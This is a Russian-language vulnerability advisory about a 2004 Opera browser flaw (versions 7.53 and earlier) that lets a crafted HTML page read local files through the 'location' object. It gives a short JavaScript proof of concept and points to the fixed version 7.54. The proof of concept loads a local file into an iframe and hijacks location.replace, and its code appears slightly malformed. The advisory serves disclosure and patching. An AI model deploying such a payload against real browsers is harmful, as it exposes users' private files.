Удаленный доступ к файлам на системе пользователя в Opera

Дата публикации:
08.08.2004
Всего просмотров:
1612
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Opera 7.53 и более ранние версии

Описание: Уязвимость обнаружена в Opera в обработке 'location' объекта. Удаленный пользователь может читать произвольные файлы на целевой системе пользователя.

Удаленный пользователь может сконструировать HTML, который, когда будет загружен целевым пользователем, прочитает файлы на целевой системе пользователе или запустит в контексте удаленного домена.

Пример/Эксплоит:

<iframe></iframe>
<script type="text/javascript">
onload=function () {
    var oVictim=frames[0];
    oVictim.location.href="file://localhost/c:/winnt/help/ciadmin.htm";
    oVictim.location.replace=function () {
        oVictim.alert("We now have full file system access using
"+location.href);
    }
 
</script>

URL производителя:http://www.opera.com/

Решение:Установите обновленную версию программы (7.54): http://www.opera.com/download/

Ссылки: Opera: Location, Location, Location

или введите имя

CAPTCHA